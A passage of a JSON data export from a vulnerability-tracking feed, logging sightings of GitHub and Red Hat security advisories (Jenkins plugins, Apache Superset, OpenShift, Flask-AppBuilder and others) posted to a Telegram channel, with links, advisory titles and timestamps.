"https://t.me/ctinow/201828", "content": "https://ift.tt/XnWt4qL\n[GHSA-8h2m-54wh-gwj3] Jenkins docker-build-step Plugin missing permission check", "creation_timestamp": "2024-03-06T21:26:14.000000Z"}, {"uuid": "8df17825-95ad-4c48-a07a-63abbd660e3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PFH3-J79R-VQRJ", "type": "seen", "source": "https://t.me/ctinow/201827", "content": "https://ift.tt/6j5hnNG\n[GHSA-pfh3-j79r-vqrj] Jenkins Delphix Plugin has improper SSL/TLS certificate validation", "creation_timestamp": "2024-03-06T21:26:12.000000Z"}, {"uuid": "778ff077-ab31-4ee7-afc7-71383261388b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ36-6XC6-8P9X", "type": "seen", "source": "https://t.me/ctinow/201826", "content": "https://ift.tt/D8HFW6b\n[GHSA-xj36-6xc6-8p9x] Jenkins Delphix Plugin has SSL/TLS certificate validation disabled by default", "creation_timestamp": "2024-03-06T21:26:11.000000Z"}, {"uuid": "c0b6986c-8354-47b7-8291-f08d8f770f30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1052", "type": "seen", "source": "https://t.me/ctinow/200942", "content": "https://ift.tt/0xwtzmF\nRHSA-2024:1052: Critical: OpenShift Container Platform 4.12.51 bug fix and security update", "creation_timestamp": "2024-03-06T02:16:54.000000Z"}, {"uuid": "103cdb35-54cd-451e-a590-a0ac84487f45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1184", "type": "seen", "source": "https://t.me/ctinow/200941", "content": "https://ift.tt/IVJAEp4\nRHSA-2024:1184: Important: squid security update", "creation_timestamp": "2024-03-06T02:16:53.000000Z"}, {"uuid": "7b0b1572-e3ca-46d1-8194-aa9a5b8ca72b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XRRW-9J78-HPF3", "type": "seen", "source": "https://t.me/ctinow/201745", "content": "https://ift.tt/34HeQAw\n[GHSA-xrrw-9j78-hpf3] Jenkins HTML Publisher Plugin Stored XSS vulnerability", "creation_timestamp": "2024-03-06T20:16:25.000000Z"}, {"uuid": "a9e56718-4e3a-46d0-b90b-771a30854b1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H7W3-XV88-2XQJ", "type": "seen", "source": "https://t.me/ctinow/191178", "content": "https://ift.tt/5W2KErs\nCVE-2024-24571 | WillyXJ facileManager up to 4.5.0 cross site scripting (GHSA-h7w3-xv88-2xqj)", "creation_timestamp": "2024-02-22T21:21:46.000000Z"}, {"uuid": "4440670f-29a1-481e-ae8a-ad2125d143dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-66C2-P8RH-QX87", "type": "seen", "source": "https://t.me/ctinow/191162", "content": "https://ift.tt/kxznde5\n[GHSA-66c2-p8rh-qx87] baserCMS Cross-site Scripting vulnerability in Site search Feature", "creation_timestamp": "2024-02-22T20:56:45.000000Z"}, {"uuid": "79061b84-e96d-4b6a-86bf-79d5a239cfee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77FC-4CV5-HMFR", "type": "seen", "source": "https://t.me/ctinow/191161", "content": "https://ift.tt/IMrWxY9\n[GHSA-77fc-4cv5-hmfr] baserCMS OS command injection vulnerability in Installer", "creation_timestamp": "2024-02-22T20:56:44.000000Z"}, {"uuid": "460fcbfe-fad0-4d4d-b055-cf972fc44116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0302", "type": "seen", "source": "https://t.me/ctinow/201428", "content": "https://ift.tt/UPWJeYS\nRHSA-2024:0302: Important: Kube Descheduler Operator for Red Hat OpenShift 5.0.0 for RHEL 9:security update", "creation_timestamp": "2024-03-06T15:16:59.000000Z"}, {"uuid": "4eeb7e19-117e-4356-aedb-5cb2c4aa393e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6QJ9-33J4-RVHG", "type": "seen", "source": "https://t.me/ctinow/202193", "content": "https://ift.tt/o8vJuEV\nCVE-2019-3990 | Harbor API Endpoint /users information disclosure (GHSA-6qj9-33j4-rvhg)", "creation_timestamp": "2024-03-07T08:36:09.000000Z"}, {"uuid": "86a76b97-4812-472a-8745-10e85e101edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1131", "type": "seen", "source": "https://t.me/ctinow/200656", "content": "https://ift.tt/2aevdw3\nRHSA-2024:1131: Moderate: golang security update", "creation_timestamp": "2024-03-05T20:17:16.000000Z"}, {"uuid": "d9cfc424-63aa-4d5b-a5b2-6210138d3147", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1134", "type": "seen", "source": "https://t.me/ctinow/200655", "content": "https://ift.tt/u5fxUXT\nRHSA-2024:1134: Important: tomcat security update", "creation_timestamp": "2024-03-05T20:17:15.000000Z"}, {"uuid": "607e9713-1b87-4107-87d5-0fc147fd2c7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1139", "type": "seen", "source": "https://t.me/ctinow/200654", "content": "https://ift.tt/hS7oK4f\nRHSA-2024:1139: Low: keylime security update", "creation_timestamp": "2024-03-05T20:17:14.000000Z"}, {"uuid": "c19cc46e-904d-48d0-8b71-e3f44e8491be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1129", "type": "seen", "source": "https://t.me/ctinow/200598", "content": "https://ift.tt/5EuHOJa\nRHSA-2024:1129: Moderate: curl security update", "creation_timestamp": "2024-03-05T19:21:55.000000Z"}, {"uuid": "aa13768b-b6c6-48f2-8927-f35d3bfa066e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1017", "type": "seen", "source": "https://t.me/ctinow/195404", "content": "https://ift.tt/XcD2l9a\nRHSA-2024:1017: Important: postgresql:15 security update", "creation_timestamp": "2024-02-28T13:17:07.000000Z"}, {"uuid": "827e37bc-6ed3-4e24-8a83-2b73d5af130f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCM8-QQRP-W6QF", "type": "seen", "source": "https://t.me/ctinow/191242", "content": "https://ift.tt/bVNpnjr\n[GHSA-pcm8-qqrp-w6qf] Enhavo Cross-site Scripting vulnerability", "creation_timestamp": "2024-02-22T22:46:30.000000Z"}, {"uuid": "3aeec148-3c5c-4665-a30d-a972e02010f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38M8-5GFC-663G", "type": "seen", "source": "https://t.me/ctinow/191241", "content": "https://ift.tt/Ypmtnd9\n[GHSA-38m8-5gfc-663g] Enhavo Cross-site Scripting vulnerability", "creation_timestamp": "2024-02-22T22:46:29.000000Z"}, {"uuid": "fcbd4f9b-2362-449e-95d0-7eeabeb759db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PX7W-C9GW-7GJ3", "type": "seen", "source": "https://t.me/ctinow/194977", "content": "https://ift.tt/hINvnXO\n[GHSA-px7w-c9gw-7gj3] Apache James server: Privilege escalation via JMX pre-authentication deserialization", "creation_timestamp": "2024-02-28T00:16:52.000000Z"}, {"uuid": "c78ef485-2215-42af-ba34-c0660a64d080", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HMX6-R76C-85G9", "type": "seen", "source": "https://t.me/ctinow/191265", "content": "https://ift.tt/AjGZByM\n[GHSA-hmx6-r76c-85g9] Gradio apps vulnerable to timing attacks to guess password", "creation_timestamp": "2024-02-22T23:17:33.000000Z"}, {"uuid": "757c5714-9296-4ba0-90fc-7393a1f7322d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6XV9-957J-QFHG", "type": "seen", "source": "https://t.me/ctinow/191258", "content": "https://ift.tt/HW3nJK5\n[GHSA-6xv9-957j-qfhg] Label Studio vulnerable to Cross-site Scripting if `", "creation_timestamp": "2024-02-22T23:07:06.000000Z"}, {"uuid": "7bee2d81-d49f-4978-b081-0296c82fe49f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RC4P-P3J9-6577", "type": "seen", "source": "https://t.me/ctinow/191250", "content": "https://ift.tt/470Gv2J\n[GHSA-rc4p-p3j9-6577] pypqc private key retrieval vulnerability", "creation_timestamp": "2024-02-22T22:51:53.000000Z"}, {"uuid": "fbcf368e-98c6-462f-9c05-4d9fa108bc31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-578P-FXMM-6229", "type": "seen", "source": "https://t.me/ctinow/191249", "content": "https://ift.tt/iSFdXvj\n[GHSA-578p-fxmm-6229] Potentially untrusted input is rendered as HTML in final output", "creation_timestamp": "2024-02-22T22:51:52.000000Z"}, {"uuid": "8f3be083-bdc4-43b9-9ef4-5a1c345153e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C579-HHW5-CR3P", "type": "seen", "source": "https://t.me/ctinow/191240", "content": "https://ift.tt/S46bH21\n[GHSA-c579-hhw5-cr3p] Enhavo Cross-site Scripting vulnerability", "creation_timestamp": "2024-02-22T22:46:28.000000Z"}, {"uuid": "713179ba-099f-4efe-acc9-7f4cab4dea5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FVV5-H29G-F6W5", "type": "seen", "source": "https://t.me/ctinow/191239", "content": "https://ift.tt/pT6mAqz\n[GHSA-fvv5-h29g-f6w5] User with ci:ReadAction permissions and write permissions to one path in a repository may copy objects from any path in the repository", "creation_timestamp": "2024-02-22T22:46:27.000000Z"}, {"uuid": "f86b6c97-e6ea-4c81-9907-8c44e61234ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8PF2-QJ4V-FJ64", "type": "seen", "source": "https://t.me/ctinow/191145", "content": "https://ift.tt/AUhCflo\n[GHSA-8pf2-qj4v-fj64] Apache Answer Cross-site Scripting vulnerability", "creation_timestamp": "2024-02-22T20:46:24.000000Z"}, {"uuid": "a40ce38b-550e-4131-aed4-5e21fdb3fef6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RMQP-MVV2-54C6", "type": "seen", "source": "https://t.me/ctinow/191144", "content": "https://ift.tt/8MSqZL6\n[GHSA-rmqp-mvv2-54c6] Apache Answer Unrestricted Upload of File with Dangerous Type vulnerability", "creation_timestamp": "2024-02-22T20:46:23.000000Z"}, {"uuid": "cc6a035c-59a6-4459-9906-f9667d6fdd22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJXQ-M8H3-4VW5", "type": "seen", "source": "https://t.me/ctinow/191143", "content": "https://ift.tt/G5RhScI\n[GHSA-jjxq-m8h3-4vw5] baserCMS Cross-site Scripting vulnerability in Content Management", "creation_timestamp": "2024-02-22T20:46:22.000000Z"}, {"uuid": "2d4181ff-2cf6-4e0b-9bce-d81d959d5027", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R53H-JV2G-VPX6", "type": "seen", "source": "https://t.me/ctinow/191142", "content": "https://ift.tt/L7Re6QU\n[GHSA-r53h-jv2g-vpx6] Helm's Missing YAML Content Leads To Panic", "creation_timestamp": "2024-02-22T20:46:21.000000Z"}, {"uuid": "eceef211-41f2-44c4-929e-6518fd0ade1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1058", "type": "seen", "source": "https://t.me/ctinow/196930", "content": "https://ift.tt/QoWKJDT\nRHSA-2024:1058: Important: python-pillow security update", "creation_timestamp": "2024-02-29T19:17:20.000000Z"}, {"uuid": "1163484c-2628-4205-a10e-cf2926c5712a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1059", "type": "seen", "source": "https://t.me/ctinow/196929", "content": "https://ift.tt/lSPA8QE\nRHSA-2024:1059: Important: python-pillow security update", "creation_timestamp": "2024-02-29T19:17:19.000000Z"}, {"uuid": "57dbe247-dc70-4878-9120-57556adbcf81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1060", "type": "seen", "source": "https://t.me/ctinow/196928", "content": "https://ift.tt/U9pY4ke\nRHSA-2024:1060: Important: python-pillow security update", "creation_timestamp": "2024-02-29T19:17:18.000000Z"}, {"uuid": "eb4892d2-875c-4a2c-945f-f695cd4f8f5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1055", "type": "seen", "source": "https://t.me/ctinow/196831", "content": "https://ift.tt/ti6ylBm\nRHSA-2024:1055: Important: kpatch-patch security update", "creation_timestamp": "2024-02-29T17:16:44.000000Z"}, {"uuid": "e6e80e1e-2f57-4646-a6bc-5b5074c4a376", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GFRH-GWQC-63CV", "type": "seen", "source": "https://t.me/ctinow/196464", "content": "https://ift.tt/grC1eaM\nCVE-2024-24807 | Sulu up to 2.4.15/2.5.11 Tag Name cross site scripting (GHSA-gfrh-gwqc-63cv)", "creation_timestamp": "2024-02-29T10:26:07.000000Z"}, {"uuid": "d5d45970-7591-4fc8-a747-c7a6cbccfbcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6648-6G96-MG35", "type": "seen", "source": "https://t.me/ctinow/196463", "content": "https://ift.tt/QjYD53L\nCVE-2024-22202 | thorsten phpMyFAQ up to 3.2.4 access control (GHSA-6648-6g96-mg35)", "creation_timestamp": "2024-02-29T10:26:06.000000Z"}, {"uuid": "e9903af0-fc28-4b3b-965a-8d2e738b7b1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C98H-V39W-3R7V", "type": "seen", "source": "https://t.me/ctinow/196402", "content": "https://ift.tt/e2zYms4\nCVE-2023-52138 | mate-desktop engrampa path traversal (GHSA-c98h-v39w-3r7v)", "creation_timestamp": "2024-02-29T09:27:12.000000Z"}, {"uuid": "e699f5b9-8d51-4aa5-afd3-d5f20d353ba3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0948", "type": "seen", "source": "https://t.me/ctinow/195616", "content": "https://ift.tt/x6fYiJK\nRHSA-2024:0948: Moderate: OpenShift Container Platform 4.13.35 security update", "creation_timestamp": "2024-02-28T16:16:12.000000Z"}, {"uuid": "c9f14525-916f-4ac9-8bae-b217a027e0e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0378", "type": "seen", "source": "https://t.me/ctinow/195606", "content": "https://ift.tt/Yh0R8o1\nCVE-2019-14867 | Ipa up to 4.6.6/4.7.3/4.8.2 Kerberos Key Data Parser ber_scanf resource consumption (RHSA-2020:0378)", "creation_timestamp": "2024-02-28T16:11:43.000000Z"}, {"uuid": "75f844f6-f9f1-4511-9360-4487903cedb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1041", "type": "seen", "source": "https://t.me/ctinow/196442", "content": "https://ift.tt/ogzcws2\nRHSA-2024:1041: Moderate: go-toolset-1.19-golang security update", "creation_timestamp": "2024-02-29T10:16:33.000000Z"}, {"uuid": "95dadc69-5aa3-4a6b-954a-bfc7b06431dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1019", "type": "seen", "source": "https://t.me/ctinow/195466", "content": "https://ift.tt/HZMgCsu\nRHSA-2024:1019: Important: kernel-rt security update", "creation_timestamp": "2024-02-28T14:18:37.000000Z"}, {"uuid": "0cff881c-3e1c-4620-b02d-863cc4be7af0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0766", "type": "seen", "source": "https://t.me/ctinow/195371", "content": "https://ift.tt/3VR7qt9\nRHSA-2024:0766: Critical: OpenShift Container Platform 4.15.0 security update", "creation_timestamp": "2024-02-28T12:16:23.000000Z"}, {"uuid": "18d9aeaf-85c5-4a30-ab62-c7ded7a55170", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-555P-M4V6-CQXV", "type": "seen", "source": "https://t.me/ctinow/195770", "content": "https://ift.tt/Xdp4BWs\n[GHSA-555p-m4v6-cqxv] ASA-2024-004: Default configuration param for Evidence may limit window of validity", "creation_timestamp": "2024-02-28T19:17:10.000000Z"}, {"uuid": "a942f388-2b1c-4833-9324-7ff28e52b769", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0969", "type": "seen", "source": "https://t.me/ctinow/195717", "content": "https://ift.tt/MwgVzFl\nRHSA-2024:0969: Important: firefox security update", "creation_timestamp": "2024-02-28T18:22:18.000000Z"}, {"uuid": "c00871e5-a5ef-490b-94c4-40f63f71c4bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J2PW-VP55-FQQJ", "type": "seen", "source": "https://t.me/ctinow/195802", "content": "https://ift.tt/r1uWaC5\n[GHSA-j2pw-vp55-fqqj] Flask-AppBuilder vulnerable to incorrect authentication when using auth type OpenID", "creation_timestamp": "2024-02-28T19:46:50.000000Z"}, {"uuid": "58dc8c08-b056-47f9-8fbc-d399d60d9c1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5474-F7G5-273Q", "type": "seen", "source": "https://t.me/ctinow/195801", "content": "https://ift.tt/0yZClYh\n[GHSA-5474-f7g5-273q] Apache Superset: Improper validation of SQL statements allows for unauthorized access to data", "creation_timestamp": "2024-02-28T19:46:49.000000Z"}, {"uuid": "7fa5b2d5-5aa7-448a-8772-5fbe0449f5c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M6JM-3V38-76J4", "type": "seen", "source": "https://t.me/ctinow/195800", "content": "https://ift.tt/GkcDzIN\n[GHSA-m6jm-3v38-76j4] Apache Superset: Improper Neutralization of custom SQL on embedded context", "creation_timestamp": "2024-02-28T19:46:47.000000Z"}, {"uuid": "3206ec4a-a874-440b-b665-f04cba7bd1d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H7R6-8QMM-HJ5R", "type": "seen", "source": "https://t.me/ctinow/195799", "content": "https://ift.tt/cIrtq95\n[GHSA-h7r6-8qmm-hj5r] Apache Superset: Improper error handling on alerts", "creation_timestamp": "2024-02-28T19:46:46.000000Z"}, {"uuid": "dd10e4b1-9195-4e08-a462-9bd678c7fa2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQXJ-46WG-9V84", "type": "seen", "source": "https://t.me/ctinow/195798", "content": "https://ift.tt/rADGtJj\n[GHSA-fqxj-46wg-9v84] Flask-AppBuilder's OAuth login page subject to Cross Site Scripting (XSS)", "creation_timestamp": "2024-02-28T19:46:45.000000Z"}, {"uuid": "ac541cd4-2fc5-4e73-813d-d8d7bb769427", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0972", "type": "seen", "source": "https://t.me/ctinow/195714", "content": "https://ift.tt/jVsNvuP\nRHSA-2024:0972: Important: firefox security update", "creation_timestamp": "2024-02-28T18:22:15.000000Z"}, {"uuid": "9fa71377-01f3-467c-bbd4-5035c1c3fa26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0378", "type": "seen", "source": "https://t.me/ctinow/195605", "content": "https://ift.tt/bqKwOWX\nCVE-2019-10195 | Ipa up to 4.6.6/4.7.3/4.8.2 Batch Processing Password information disclosure (RHSA-2020:0378)", "creation_timestamp": "2024-02-28T16:11:42.000000Z"}, {"uuid": "0de1fb32-9bd6-4c06-9a10-3c70acedf0db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0999", "type": "seen", "source": "https://t.me/ctinow/194077", "content": "https://ift.tt/hZjYDVU\nRHSA-2024:0999: Important: kernel security update", "creation_timestamp": "2024-02-27T08:17:00.000000Z"}, {"uuid": "be33f990-5d9a-4b44-893f-fdddae677b9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WHH8-FJGC-QP73", "type": "seen", "source": "https://t.me/ctinow/192175", "content": "https://ift.tt/tK6J7Fo\n[GHSA-whh8-fjgc-qp73] Onnx Directory Traversal vulnerability", "creation_timestamp": "2024-02-23T21:22:08.000000Z"}, {"uuid": "00d55831-6c6f-44f0-8853-afa61e878ebf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8HP3-RMR7-XH88", "type": "seen", "source": "https://t.me/ctinow/189053", "content": "https://ift.tt/GWqnTa0\n[GHSA-8hp3-rmr7-xh88] Open Redirect in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T00:56:28.000000Z"}, {"uuid": "f0991548-13de-4673-a35b-96d84fc69db6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R969-783F-6JQR", "type": "seen", "source": "https://t.me/ctinow/189052", "content": "https://ift.tt/kbqVcNF\n[GHSA-r969-783f-6jqr] Improper Neutralization of HTTP Headers in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T00:56:27.000000Z"}, {"uuid": "9e1831bc-7c7a-41a8-8d97-f1458f4c2866", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFPH-HJFV-CPV2", "type": "seen", "source": "https://t.me/ctinow/189051", "content": "https://ift.tt/1fhorc9\n[GHSA-vfph-hjfv-cpv2] Improper Restriction of Excessive Authentication Attempts in github.com/greenpau/caddy-security", "creation_timestamp": "2024-02-21T00:56:26.000000Z"}, {"uuid": "8dff5075-546a-47ed-83ff-83d273f8d48c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0880", "type": "seen", "source": "https://t.me/ctinow/188404", "content": "https://ift.tt/Mi7sjQU\nRHSA-2024:0880: Critical: Release of OpenShift Serverless Client kn 1.31.1 security update", "creation_timestamp": "2024-02-20T12:16:47.000000Z"}, {"uuid": "578ffc1a-7a1c-4ff4-a931-e246fe58ebee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X989-52FC-4VR4", "type": "seen", "source": "https://t.me/ctinow/189057", "content": "https://ift.tt/QDABKVb\n[GHSA-x989-52fc-4vr4] Unencrypted traffic between pods when using Wireguard and an external kvstore", "creation_timestamp": "2024-02-21T00:56:35.000000Z"}, {"uuid": "7c4b6ef0-ea9d-4355-9aff-01ff2b88f2cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7496-FGV9-XW82", "type": "seen", "source": "https://t.me/ctinow/189056", "content": "https://ift.tt/YzM9qdJ\n[GHSA-7496-fgv9-xw82] Unencrypted ingress/health traffic when using Wireguard transparent encryption", "creation_timestamp": "2024-02-21T00:56:34.000000Z"}, {"uuid": "bc0e898c-3a7f-4efb-a51f-e33d9149b733", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9W99-78RJ-HMXQ", "type": "seen", "source": "https://t.me/ctinow/189055", "content": "https://ift.tt/OBMzbVi\n[GHSA-9w99-78rj-hmxq] Cross-site scripting (XSS) in the dynamic file uploads", "creation_timestamp": "2024-02-21T00:56:33.000000Z"}, {"uuid": "18c0e53b-fa76-43c1-8956-d3d535da34b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0853", "type": "seen", "source": "https://t.me/ctinow/189655", "content": "https://ift.tt/itNuk2Q\nRHSA-2024:0853: Moderate: Network Observability 1.5.0 for OpenShift", "creation_timestamp": "2024-02-21T15:16:36.000000Z"}, {"uuid": "3e95eab5-95c5-4c52-90e9-ca0c0eb38b53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HFP-M9GV-M753", "type": "seen", "source": "https://t.me/ctinow/189957", "content": "https://ift.tt/KoBjXIG\n[GHSA-4hfp-m9gv-m753] XWiki extension license information is public, exposing instance id and license holder details", "creation_timestamp": "2024-02-21T19:16:54.000000Z"}, {"uuid": "0a629503-e873-42ec-8854-5d6bd57605eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:2587", "type": "seen", "source": "https://t.me/ctinow/193374", "content": "https://ift.tt/wl2UC0S\nCVE-2018-10854 | CloudForms 5.8/5.9 v2v Infrastructure Mapping Delete Name Stored cross site scripting (RHSA-2019:2587)", "creation_timestamp": 